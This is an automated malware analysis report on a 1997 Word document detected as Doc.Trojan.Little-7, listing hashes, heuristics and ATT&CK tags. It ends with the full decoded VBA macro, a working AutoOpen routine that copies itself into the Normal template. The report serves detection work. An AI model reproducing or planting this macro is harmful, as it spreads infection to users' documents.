Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 05abfb286cbe1c6d…

MALICIOUS

Office (OLE)

32.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 898d971f6af044defdc85f646da482aa SHA-1: d2d212cea97b88ee4d640b6126cf6f5d7793c0ad SHA-256: 05abfb286cbe1c6d280241c6f0eeaec0ef0fb10bc269526fd23906bf5faf7fa5
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to export itself to 'c:\small.dll' and then import it, likely to establish persistence or execute a second-stage payload. The heuristic firings and ClamAV detection strongly indicate malicious intent, specifically a trojan dropper.

Heuristics 4

  • ClamAV: Doc.Trojan.Little-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Little-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 745 bytes
SHA-256: eea32e2c8b4615673a40a16decdd5c220604c14f56a945a6b49b586c8cebbb95
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "s"
Sub AutoOpen()
On Error Resume Next
A$ = "HKEY_CURRENT_USER\small"
If (System.PrivateProfileString("", A$, "small") = False) Then
ActiveDocument.VBProject.VBComponents("s").Export "c:\small.dll"
NormalTemplate.VBProject.VBComponents.Import ("c:\small.dll")
System.PrivateProfileString("", A$, "small") = True
ElseIf ActiveDocument.VBProject.VBComponents.Item("s").Name <> "s" Then
ActiveDocument.VBProject.VBComponents.Import ("c:\small.dll")
End If
End Sub